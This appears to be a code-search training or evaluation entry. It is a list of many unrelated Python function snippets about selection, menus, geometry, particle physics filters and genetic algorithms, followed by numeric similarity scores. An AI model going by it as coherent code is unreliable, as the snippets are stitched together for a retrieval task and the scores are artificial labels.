self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 'disk' )\n\t\texcept uvmmd.UvmmError, e:\n\t\t\tvols = ()\n\t\tud.debug(ud.ADMIN, ud.INFO, 'UVMM.DW.ps: volumes=%s' % map(str, vols))\n\t\tchoices = []\n\t\tfor vol in vols:\n\t\t\tbasename = os.path.basename( vol.source )\n\t\t\tif '.' in basename:\n\t\t\t\tsuffix = basename[ basename.rfind( '.' ) + 1 : ]\n\t\t\t\tif suffix in ( 'xml', 'snapshot' ):\n\t\t\t\t\tcontinue\n\t\t\tchoices.append( basename )\n\t\tchoices.sort()\n\t\tself.image_syntax.update_choices( choices )\n\n\t\t# recreate pool button\n\t\tbtn = self._create_pool_select_button( object.options )\n\t\tself[DriveWizard.PAGE_OLD].options[0] = btn\n\t\tself[DriveWizard.PAGE_NEW].options[0] = btn\n\t\t# recreate driver-type button\n\t\titems = [self[DriveWizard.PAGE_NEW].options[2].id(), self[DriveWizard.PAGE_NEW].options[3].id()]\n\t\tbtn = self._create_type_select_button(object.options, items)\n\t\tself[DriveWizard.PAGE_NEW].options[1] = btn\n\n\t\tif drive_type == 'disk':\n\t\t\tself[DriveWizard.PAGE_OLD].hint = None\n\t\telif drive_type in ( 'cdrom', 'floppy' ):\n\t\t\tif self.image_syntax._choices:\n\t\t\t\tmsg = _( \"If the required image is not found it might be added by copying the file into the storage pool, e.g. to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. The image should now be listed.\" )\n\t\t\telse:\n\t\t\t\tmsg = _( \"The list of available images is empty! To add an image the file needs to be copied into the storage pool, e.g. to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. The image should now be listed.\" )\n\t\t\tself[DriveWizard.PAGE_OLD].hint = msg\n\t\t\tself[DriveWizard.PAGE_OLD].description = ''\n\t\telse:\n\t\t\traise ValueError('Invalid drive-type \"%s\"' % drive_type)\n\n\t\treturn self.type_selected(object)", "def create_pressure_vessel_geometry():\r\n\r\n # configure sigmoid function\r\n bounds_upper = [3, 6]\r\n h = 5\r\n w = 6\r\n\r\n sigmoid_function = lambda x: (1 / (1 + np.exp(-1 * h * x + w))) + 1\r\n\r\n sigmoid_function_reverse = lambda x: 1 / (1 + np.exp(h * x - w - 18)) + 1\r\n\r\n funcs_upper = [sigmoid_function, sigmoid_function_reverse]\r\n\r\n bounds_lower = None\r\n funcs_lower = 0\r\n\r\n x_max = 6\r\n x_min = 0\r\n resolution = 10000\r\n\r\n pressure_vessel = Geometry(x_max, x_min, resolution,\r\n bounds_upper, funcs_upper,\r\n bounds_lower, funcs_lower)\r\n\r\n return pressure_vessel", "def Gd():\n Pz=[8]\n Pp=[1,1]\n return Pz, Pp", "def sel2para(*args):\n return _ida_segment.sel2para(*args)", "def choose(self, g, c, p):\n ng = copy.deepcopy(g)\n ng[c[0]][c[1]] = p\n return ng", "def build_selection_spec(client_factory, name):\r\n sel_spec = client_factory.create('ns0:SelectionSpec')\r\n sel_spec.name = name\r\n return sel_spec", "def pairing_group_create(curve='MNT224'):\n return PairingGroup(curve)", "def _select(self):\n sel = []\n\n # choose randomly while favouring fit individuals\n lp = len(self.population) // 2\n for _ in range(lp):\n idx1 = idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n while idx1 == idx2:\n idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n\n p1, p2 = self.population[idx1], self.population[idx2]\n sel.append((p1, p2))\n\n return sel", "def pick_grom_group(group, other, selected):\n\treturn Faction(over(group, selected), over(group + other, selected))", "def create_point(x_crd, y_crd):\n\n Point = namedtuple(\"Point\", \"x_crd y_crd\")\n return Point(x_crd, y_crd)", "def getSelector(self, node):\n self.checkModelOpen()\n calcEngine = CalcEngine.factory(self.client_session)\n return calcEngine.getSelector(node)", "def _select_single(self, disc):\n return QuadraticFieldClassNumbersTable._select_single(self, -disc)", "def select(self):\n return", "def select(self, test):\n survivors = []\n for particle in self.particles:\n # Find the originating particle\n parent = particle\n while parent.origin is not None:\n parent = parent.origin.initial_state[0]\n if test(parent, particle) is True:\n survivors.append(particle)\n return ParticleCollection(survivors)", "def select_operator(operators, weights, rnd_state):\n return rnd_state.choice(np.arange(0, len(operators)),\n p=weights / np.sum(weights))", "def active_selection():\r\n\r\n om.MGlobal.getActiveSelectionList()", "def __call__(self):\n new_node = Node()\n new_node.op = self\n return new_node", "def water_selection(self):\n sel_cache = self.pdb_hierarchy.atom_selection_cache()\n sel_str = \"({}) and element O and altloc ' '\".format(\n \" or \".join([ \"resname \" + i for i in WATER_RES_NAMES ]))\n return sel_cache.selection(sel_str).iselection()", "def __call__(self):\r\n new_node = Node()\r\n new_node.op = self\r\n return new_node", "def selectLinkedElement():\n\n collector = FilteredElementCollector(doc).ToElementIds()\n wrongAngle = []\n for id in collector:\n \n element= doc.GetElement(id)\n\n if element.get_Parameter(BuiltInParameter.FABRICATION_PART_ANGLE) is not None:\n try:\n chord = element.CenterlineLength\n angle = element.get_Parameter(BuiltInParameter.FABRICATION_PART_ANGLE).AsDouble()\n angle = degrees(angle)\n diameter = element.get_Parameter(BuiltInParameter.FABRICATION_PART_DIAMETER_IN).AsDouble()\n radius = ((360/angle)*chord )/(pi*2)\n \n if round(radius,4) == round(diameter,4):\n wrongAngle.append(id)\n\n except Exception as ex:\n print(ex, str(id))\n pass\n\n wrongAngle = List[ElementId](wrongAngle)\n uidoc.Selection.SetElementIds(wrongAngle)", "def select(self, *dims):\n return select(self, *dims)", "def selection(probs):\n # pick 2 parents out of this distribution\n t = [i for i in range(len(probs))]\n draw = choice(t, 2, p=probs, replace=False)\n return draw", "def __make_sel(selection):\n sel = []\n param = []\n for key, value in selection.iteritems(): \n if key == \"fn\":\n if value.find('%') >= 0:\n sel.append(\"irods_filepath like %s\")\n else:\n sel.append(\"irods_filepath = %s\")\n elif key == \"expid\":\n sel.append(\"exper_id = %s\".format(value))\n elif key == 'runnum':\n sel.append(\"runnum = %s\".format(value))\n elif key == 'status' and value:\n sel.append(\"status = %s\")\n else:\n continue\n param.append(value)\n\n q = \"WHERE {}\".format(\" AND \".join(sel)) if sel else \"\"\n return q, param", "def createAxisOperationsButtonAndMenu(self):\n button = QtGui.QToolButton()\n menu = QtGui.QMenu(self) \n \n opDefs = ['def default axis points',\n 'sum summation of selected axis points',\n 'avg average of selected axis points',\n 'wgt weighted average of selected axis points',\n 'awt altered weighted average of selected axis points',\n 'gtm geometrical mean of selected axis points',\n 'std standard deviation of selected axis points',]\n \n for op in opDefs:\n action = menu.addAction(op)\n self.connect(action, QtCore.SIGNAL('triggered ()'),\n self.selectAxesOperationEvent)\n\n button.setText(' def ')\n button.setMenu(menu)\n button.setPopupMode(QtGui.QToolButton.InstantPopup)\n\n # Connect Signals\n self.connect(button, QtCore.SIGNAL('clicked(bool)'),\n button.showMenu)\n\n return button", "def select_reg(self, r0, r1, add_zeros=False):\r\n # Retrieve database first and last registry entry values\r\n r0_db, r1_db = self.data.index[0], self.data.index[-1]\r\n\r\n # Check invalid input, if r1 > r1_db, add zeros or error.\r\n if r0 < r0_db or r0 >= r1 or r0 > r1_db:\r\n raise IndexError(f'{self} no possible reg selection'\r\n f' for {r0, r1}.')\r\n\r\n elif r1 > r1_db:\r\n if add_zeros:\r\n ind_appen = range(r1_db + 1, r1 + 1)\r\n ad = pd.DataFrame(0, index=ind_appen, columns=self.data.columns)\r\n self.data = self.data.append(ad)\r\n else:\r\n raise IndexError(f'{self} no possible reg selection for '\r\n f'{r0, r1} without adding zeros.')\r\n\r\n # Make the data selection\r\n self.data = self.data.loc[r0: r1 - 1, :]", "def pions ( self ) :\n from GaudiConfUtils.ConfigurableGenerators import FilterDesktop\n ##\n if self['NOPIDHADRONS'] :\n from StandardParticles import StdAllNoPIDsPions as inpts\n pioncut = self['PionCut']\n else :\n from StandardParticles import StdAllLooseANNPions as inpts\n pioncut = \"(%s)&(%s)\" % ( self['PionCut'] , self['PionPIDCut'] ) \n ##\n return self.make_selection (\n 'Pion' ,\n FilterDesktop ,\n [ inpts ] ,\n Code = pioncut ,\n )", "def include_selection(data, selection):\n\n new_data = list()\n\n for a_data_point in data:\n\n if ('resonance_id' in a_data_point.par and a_data_point.par[\n 'resonance_id'] in selection):\n new_data.append(a_data_point)\n\n return new_data", "def __init__(\n self, name: str, values: List[Dict], index: Optional[int] = 0,\n label: Optional[str] = None, help: Optional[str] = None,\n default: Optional[bool] = None, required: Optional[bool] = False,\n group: Optional[str] = None\n ):\n super(Select, self).__init__(\n dtype=PARA_SELECT,\n name=name,\n index=index,\n label=label,\n help=help,\n default=default,\n required=required,\n group=group\n )\n self.values = values", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def __init__(self):\n super().__init__()\n self.p = 0.0\n self.type = 'Geometric'\n self.distType = 'Discrete'\n self.lowerBound = 0.0\n self.upperBound = 1.0\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def selectPointsUnderCursor(self):\n #spw = self.spw\n #sw = spw.windows['Sort']\n #if clear:\n # sw.uslist.clearSelection()\n # sw.nlist.clearSelection()\n x, y = self.cursorPosGL()\n sids = self.pick(x, y, pb=10, multiple=True)\n if sids == None:\n return\n #t0 = time.time()\n #if not sw.panel.maxed_out:\n # spw.SelectSpikes(sids, on=self.selecting)\n #else:\n # # for speed, while the mouse is held down and the sort panel is maxed out,\n # # don't call SelectSpikes, only call it once when the mouse is released\n self.collected_sids.append(sids)\n #print('SelectSpikes took %.3f sec' % (time.time()-t0))\n if self.selecting == True:\n sat = 0.2 # desaturate\n else: # self.selecting == False\n sat = 1 # resaturate\n self.color(sids, sat=sat)\n self.updateGL()", "def create_menu():\n MenuData = [\n (\"&Draw Variables\",drawable.ask),\n (\"&Show Variables\",printall),\n (\"&Print Variables\",printval),\n (\"&Edit Variable\",edit),\n (\"&Rename Variable\",rename),\n (\"&Forget Variables\",forget),\n (\"---\",None),\n (\"&Create Plane\",\n [(\"Coordinates\", \n [(\"Point and normal\", createPlaneCoordsPointNormal),\n (\"Three points\", createPlaneCoords3Points),\n ]), \n (\"Visually\", \n [(\"Three points\", createPlaneVisual3Points),\n ]),\n ]),\n (\"&Select Plane\",planes.ask),\n (\"&Draw Selection\",planes.draw),\n (\"&Forget Selection\",planes.forget),\n (\"---\",None),\n (\"&Pick Actors\",pick_actors),\n (\"&Pick Elements\",pick_elements),\n (\"&Pick Points\",pick_points),\n (\"&Pick Edges\",pick_edges),\n (\"---\",None),\n ('&Selection',\n [('&Create Report',report_selection),\n ('&Set Property',setprop_selection),\n ('&Grow',grow_selection),\n ('&Partition',partition_selection),\n ('&Get Partition',get_partition),\n ('&Export',export_selection),\n ]),\n (\"---\",None),\n ('&Query',\n [('&Actors',query_actors),\n ('&Elements',query_elements),\n ('&Points',query_points),\n ('&Edges',query_edges),\n ('&Distances',query_distances),\n ]),\n (\"---\",None),\n (\"&Close\",close_menu),\n ]\n return widgets.Menu('Tools',items=MenuData,parent=GD.gui.menu,before='help')", "def newConnection(self, btnParent = None):\n selected = cmds.ls(selection = True) #current selection\n\n if btnParent != None: #display button\n parent = btnParent\n selected = []\n else: #make parent current tab\n parent = tab = self.tabwidget.currentWidget()\n\n btnColor = self.color.currentText() #button color\n btnName = self.nameBox.text() #button name\n return self.newDragBtn(btnColor, selected, btnName, parent, self.btnWidth.value(), self.btnHeight.value(), self.tabwidget.currentWidget())", "def sir_model():\n ddpp = rmf.DDPP()\n ddpp.add_transition([-1,1,0],lambda x:x[0]+2*x[0]*x[1])\n ddpp.add_transition([0,-1,+1],lambda x:x[1])\n ddpp.add_transition([1,0,-1],lambda x:3*x[2]**3)\n ddpp.set_initial_state([.3,.2,.5]) # We first need to define an initial stater\n return ddpp", "def __getSelectionFilter(self):\n \n selectionPairs = []\n selectionPairs.append(('field','field'))\n selectionPairs.append(('spw','spw'))\n selectionPairs.append(('polarization','correlation'))\n selectionPairs.append(('baseline','antenna'))\n selectionPairs.append(('time','timerange'))\n selectionPairs.append(('scan','scan'))\n selectionPairs.append(('uvdist','uvrange'))\n selectionPairs.append(('scanintent','intent'))\n selectionPairs.append(('observation','observation'))\n return self.__generateFilter(selectionPairs)", "def sel(\n self,\n **kwargs,\n ) -> \"Dataset\":\n res = [da.sel(**kwargs) for da in self]\n return Dataset(data=res, validate=False)", "def PricingStartCurvesVector(builder, numElems):\n return StartCurvesVector(builder, numElems)", "def _get_button_region(self):\n # XXXX Only rectangulars for now\n if not self._sensitive:\n return None\n if not self._insidetemporal():\n return None\n rgn = Qd.NewRgn()\n if self._shape == 'rect':\n x0, y0 = self._convert_point(self._coordinates[0:2])\n x1, y1 = self._convert_point(self._coordinates[2:4])\n box = x0, y0, x1, y1\n Qd.RectRgn(rgn, box)\n elif self._shape == 'poly':\n Qd.OpenRgn()\n xl, yl = self._convert_point(self._coordinates[-2:])\n Qd.MoveTo(xl, yl)\n for i in range(0, len(self._coordinates), 2):\n x, y = self._convert_point(self._coordinates[i:i+2])\n Qd.LineTo(x, y)\n Qd.CloseRgn(rgn)\n elif self._shape == 'circle':\n print 'Circle not supported yet'\n elif self._shape == 'ellipse':\n # Note: rx/ry are width/height, not points\n x, y, rx, ry = self._dispobj._window._convert_coordinates(self._coordinates)\n Qd.OpenRgn()\n Qd.FrameOval((x-rx, y-ry, x+rx, y+ry))\n Qd.CloseRgn(rgn)\n else:\n print 'Invalid shape type', self._shape\n return rgn", "def selection(self):\r\n if not self._selection:\r\n print(\"not working\")\r\n return None\r\n\r\n year, month = self._date.year, self._date.month\r\n if len(str(month))==1:\r\n month = \"0{}\".format(month)\r\n return (\"{}{}{}\".format(year, month, self._selection[0]), \r\n \"{} / {} / {}\".format(year, month, self._selection[0]))", "def range(self, event):\r\n \r\n p = (event.x, self.toCartesian(event.y))\r\n \r\n if self.selectedRegion is None:\r\n self.selectedStart = Region(p[X],p[Y], p[X],p[Y])\r\n self.selectedRegion = self.selectedStart.unionPoint(p)\r\n \r\n self.paint()\r\n \r\n # return (node,sub-tree) where sub-tree is True if draining entire tree\r\n # rooted at node. Draw these as shaded red rectangle to identify whole\r\n # sub-tree is selected.\r\n for pair in self.tree.range(self.selectedRegion):\r\n p = pair[0].point\r\n \r\n if pair[1]:\r\n self.canvas.create_rectangle(pair[0].region.x_min, self.toTk(pair[0].region.y_min), \r\n pair[0].region.x_max, self.toTk(pair[0].region.y_max),\r\n fill='Red', stipple='gray12')\r\n else:\r\n self.canvas.create_rectangle(p[X] - BoxSize, self.toTk(p[Y]) - BoxSize, \r\n p[X] + BoxSize, self.toTk(p[Y]) + BoxSize, fill='Red')\r\n\r\n self.queryRect = self.canvas.create_rectangle(self.selectedRegion.x_min, self.toTk(self.selectedRegion.y_min), \r\n self.selectedRegion.x_max, self.toTk(self.selectedRegion.y_max), \r\n outline='Red', dash=(2, 4))", "def ipset_one_x_new():\n x = np.linspace(-3, 3, 11)\n return IPSet(x=x, y=x ** 2, x_new=1)" ]
[ "0.63153064", "0.5997607", "0.5657909", "0.5577311", "0.55091554", "0.5479855", "0.52665573", "0.5263441", "0.51841724", "0.5104352", "0.50552374", "0.49336368", "0.49273384", "0.49023122", "0.4876281", "0.48567244", "0.4838079", "0.48378935", "0.47973046", "0.47966853", "0.47885236", "0.47756404", "0.4732002", "0.47064656", "0.47033882", "0.4684112", "0.46776748", "0.46765655", "0.4668958", "0.46572882", "0.4645869", "0.46425867", "0.4634486", "0.46281308", "0.46130538", "0.46108025", "0.45868474", "0.45774594", "0.45774594", "0.4575116", "0.45629814", "0.45529646", "0.45523158", "0.4550593", "0.45445558", "0.45402125", "0.4531364", "0.4527998", "0.45271552", "0.45211455", "0.45209572", "0.4508082", "0.4505488", "0.4503868", "0.45015427", "0.4500083", "0.4499608", "0.44820884", "0.44782865", "0.4473344", "0.4465156", "0.44634694", "0.4454673", "0.44429997", "0.44306546", "0.44217092", "0.44119287", "0.44084087", "0.44029078", "0.44012365", "0.43855557", "0.43846485", "0.43824124", "0.43763396", "0.43762296", "0.43755993", "0.43751", "0.43635476", "0.43619356", "0.43601176", "0.43601176", "0.43601176", "0.43601176", "0.43601176", "0.43601176", "0.43601176", "0.43601176", "0.43601176", "0.43566158", "0.4355648", "0.43526277", "0.4348245", "0.4346432", "0.43442172", "0.4333623", "0.43322158", "0.43275386", "0.43261766", "0.432205", "0.43213907" ]
0.5291082
6
Create and return a D > D0 pi Selection object.
def makePseudoPsi( name , config , DecayDescriptor , inputSel ) : _daugCuts = "(PT> %(D0PtLoose)s*MeV)" % locals()['config'] _combCuts = "(APT> %(D0PtLoose)s*MeV)" % locals()['config'] _Psi = CombineParticles( DecayDescriptor = DecayDescriptor , DaughtersCuts = { "D0": _daugCuts } , CombinationCut = _combCuts , MotherCut = "(VFASPF(VCHI2PDOF) < 10000)" ) return Selection( name+'Sel', Algorithm = _Psi, RequiredSelections = inputSel )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def makeDstar2D0Pi( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def make_selection ( self ,\n tag , \n algotype ,\n inputs , \n *args ,\n **kwargs ) :\n sel_tag = '%s_Selection' % tag\n sel_name = 'Sel%sFor%s' % ( tag , self.name() )\n #\n ## check existing selection\n #\n sel = self._selection ( sel_tag )\n if sel : return sel \n\n #\n ## adjust a bit the arguments\n if not kwargs.has_key('Preambulo') :\n kwargs ['Preambulo' ] = self['Preambulo']\n\n if not kwargs.has_key( 'ParticleCombiners' ) :\n kwargs ['ParticleCombiners'] = { '' : 'LoKi::VertexFitter:PUBLIC' } \n \n # \n ## use \"simple-selection\"\n #\n from PhysSelPython.Wrappers import SimpleSelection\n sel = SimpleSelection (\n sel_name ,\n algotype ,\n inputs , \n *args ,\n **kwargs )\n # \n return self._add_selection( sel_tag , sel )", "def from_selection(cls):\n guid = compas_rhino.select_point()\n return cls.from_guid(guid)", "def create(cls, selection):\n\t\t\n\t\treturn cls({ true_selector: selection, false_selector: Selection.invert(selection) })", "def from_selection(\n class_,\n selection,\n item_class=None,\n ):\n import abjad\n pitch_segment = abjad.PitchSegment.from_selection(selection)\n return class_(\n pitch_segment,\n item_class=item_class,\n )", "def makeDefault(name,inputSel) :\n from Configurables import OfflineVertexFitter\n Detached4mu = CombineParticles(\"Combine\"+name)\n Detached4mu.DecayDescriptor = \"B_s0 -> mu+ mu- mu+ mu-\"\n # Set the OfflineVertexFitter to keep the 4 tracks and not the J/Psi Kstar:\n Detached4mu.addTool( OfflineVertexFitter )\n Detached4mu.ParticleCombiners.update( { \"\" : \"OfflineVertexFitter\"} )\n Detached4mu.OfflineVertexFitter.useResonanceVertex = False\n Detached4mu.ReFitPVs = True\n Detached4mu.DaughtersCuts = { \"mu+\" : \"(TRCHI2DOF < 2.5 ) \"\\\n \" & (MIPCHI2DV(PRIMARY)> 9.)\"}\n \n Detached4mu.CombinationCut = \"(ADAMASS('B_s0')<1000*MeV) \"\\\n \"& (AMAXDOCA('')<0.3*mm)\"\n Detached4mu.MotherCut = \"(VFASPF(VCHI2/VDOF)<9) \"\\\n \"& (BPVDIRA > 0) \"\\\n \"& (BPVVDCHI2>100)\"\\\n \" & (M>4366.3) & (M<6366.3)\"\\\n \"& (BPVIPCHI2()< 25) \"\n \n\n return Selection (name,\n Algorithm = Detached4mu,\n RequiredSelections = inputSel)", "def make_odorant_selector(name):\n return dcc.Input(\n id=\"cid_%s\" % name,\n placeholder=\"Enter a PubChem ID number...\",\n type=\"number\",\n value=None,\n )", "def createSelector(self,type='select',speed=2.0):\n self.selector = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector.hide()\n ival = self.selector.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def __init__(self,initial_v,v_select=0,max_dev_semitones=1):\n self.v=initial_v\n self.v_select=v_select\n self.max_dev_semitones=max_dev_semitones", "def __init__(self):\n super().__init__()\n self.p = 0.0\n self.type = 'Geometric'\n self.distType = 'Discrete'\n self.lowerBound = 0.0\n self.upperBound = 1.0\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def __init__(self, pvID, pvP, pvQ, pvDescriptor):\n\n # TODO: implement this", "def makeDstarPartial( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def from_selection(cls):\n guid = compas_rhino.select_mesh()\n return cls.from_guid(guid)", "def createSelector2(self,type='select',speed=2.0):\n self.selector2 = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector2.hide()\n ival = self.selector2.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def __init__(self):\n super().__init__()\n self.p = 0.0\n self.type = 'Bernoulli'\n self.distType = 'Discrete'\n self.lowerBound = 0.0\n self.upperBound = 1.0\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def __init__(self, P, I, D, dt):\n\n\t\tself._Kp = P\n\t\tself._Ki = I\n\t\tself._Kd = D\n\t\tself._dt = dt", "def curve_through_selection(*args):\n sel = cmds.ls(sl=True, fl=True)\n if not sel or len(sel)==1:\n cmds.warning(\"You need to select multiple things to create curve through!\")\n return()\n\n pList = []\n crvType = cmds.radioButtonGrp(widgets[\"crvSelRBG\"], q=True, sl=True)\n\n for obj in sel:\n if cmds.objectType(obj) in [\"transform\"]:\n pos = cmds.xform(obj, q=True, ws=True, rp=True)\n pList.append(pos)\n elif obj in cmds.filterExpand(sm=[28, 30, 31, 32, 34, 46]):\n pos = cmds.pointPosition(obj)\n pList.append(pos)\n\n #add points if only 2 (cv, ep) or 3 (cv) are given, and create the curve\n if crvType == 1:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n vec1 = [pList[1][0]-pList[0][0], pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n if len(pList) == 3:\n vec1 = [pList[1][0]-pList[0][0], pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n crv = cmds.curve(d=3, p=pList, name=\"newCurve\")\n\n if crvType == 2:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n crv = cmds.curve(d=3, ep=pList, name=\"newCurve\")\n\n return(crv)", "def __init__(\n self, name: str, values: List[Dict], index: Optional[int] = 0,\n label: Optional[str] = None, help: Optional[str] = None,\n default: Optional[bool] = None, required: Optional[bool] = False,\n group: Optional[str] = None\n ):\n super(Select, self).__init__(\n dtype=PARA_SELECT,\n name=name,\n index=index,\n label=label,\n help=help,\n default=default,\n required=required,\n group=group\n )\n self.values = values", "def build_selection_spec(client_factory, name):\r\n sel_spec = client_factory.create('ns0:SelectionSpec')\r\n sel_spec.name = name\r\n return sel_spec", "def __init__(self):\n super().__init__()\n self.n = 0.0\n self.p = 0.0\n self.type = 'Binomial'\n self.hasInfiniteBound = True\n self.distType = 'Discrete'\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def select(self):\n\t\tbest_num_components = self.n_constant\n\t\treturn self.base_model(best_num_components)", "def pdos_select(self, atoms=None, spin=None, l=None, m=None):\n valid_m_values = {'s': [],\n 'p': ['x', 'y', 'z'],\n 'd': ['xy', 'yz', 'z2-r2', 'xz', 'x2-y2'],\n 'f': ['y(3x2-y2)', 'xyz', 'yz2', 'z3', 'xz2', 'z(x2-y2)', 'x(x2-3y2)']}\n if not atoms:\n atom_idx = list(range(self.number_of_atoms))\n else:\n atom_idx = atoms\n to_return = self.pdos_raw[atom_idx, :, :, :]\n if not spin:\n spin_idx = list(range(self.ispin))\n elif spin == 'up':\n spin_idx = [0]\n elif spin == 'down':\n spin_idx = [1]\n elif spin == 'both':\n spin_idx = [0, 1]\n else:\n raise ValueError\n to_return = to_return[:, :, :, spin_idx]\n\n if not l:\n channel_idx = list(range(self.number_of_channels))\n elif l == 's':\n channel_idx = [0]\n elif l == 'p':\n if not m:\n channel_idx = [1, 2, 3]\n else:\n channel_idx = [1 + i for i, v in enumerate(valid_m_values['p']) if v in m]\n elif l == 'd':\n if not m:\n channel_idx = [4, 5, 6, 7, 8]\n else:\n channel_idx = [4 + i for i, v in enumerate(valid_m_values['d']) if v in m]\n elif l == 'f':\n if not m:\n channel_idx = [9, 10, 11, 12, 13, 14, 15]\n else:\n channel_idx = [9 + i for i, v in enumerate(valid_m_values['f']) if v in m]\n else:\n raise ValueError\n\n return to_return[:, :, channel_idx, :]", "def __init__(self, parent):\n # parent is the main frame of PyCorrFit\n self.parent = parent\n ## MYID\n # This ID is given by the parent for an instance of this class\n self.MyID = None\n ## Wrapping\n curvedict, labels = self.GetCurvedict()\n self.labels = labels\n self.Selector = UserSelectCurves(parent, curvedict,\n wrapper=self, labels=labels)\n # This is necessary for parent to deselect and select the tool\n # in the tools menu.\n self.Bind = self.Selector.Bind\n if self.parent.notebook.GetPageCount() == 0:\n self.Selector.sp.Disable()", "def __init__(self, p) -> None:\n self._p = p\n self._delegate = TwoQubitAsymmetricDepolarizingChannel(p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15)", "def _an_element_(self):\n from sage.rings.integer_ring import ZZ\n return self(self.realization_of().PD().get_point(ZZ.zero()))", "def 选择项目(self, n): # real signature unknown; restored from __doc__\n return self.Select(n)", "def _select_single(self, disc):\n return QuadraticFieldClassNumbersTable._select_single(self, -disc)", "def __init__(self, r=1, p=3):\n self.p = p\n self.r = r", "def generate_kdtree(self):\n if self.method==2:\n coordinates = self.unassigned_data[0:3,:]\n else:\n coordinates = self.unassigned_data[0:2,:]\n tree = cKDTree(coordinates.T)\n\n return tree", "def make_selection(self, num):\n other_doors = None\n if num is 1:\n other_doors = [str(2), str(3)]\n elif num is 2:\n other_doors = [str(1), str(3)]\n elif num is 3:\n other_doors = [str(1), str(2)]\n\n reveal = str(random.choice(other_doors))\n other_doors.remove(reveal)\n third_door = random.choice(other_doors)\n other_doors.remove(third_door)\n\n main_door = getattr(self, 'door' + str(num) + '_counter')\n door_second = getattr(self, 'door' + reveal + '_counter')\n door_third = getattr(self, 'door' + third_door + '_counter')\n main_door_reveal = getattr(self, 'door'+str(num)+'_reveal')\n\n if (main_door is 0 and door_second is 0\n and door_third is 0):\n self.ids['door'+reveal].source = \\\n getattr(self, 'door'+reveal+'_reveal')\n self.ids['button'+reveal].disabled = True\n inc = getattr(self, 'door' + str(num) + '_counter')\n setattr(self, 'door' + str(num) + '_counter', inc + 1)\n elif main_door is 1 and door_second is 0 and door_third is 0:\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n 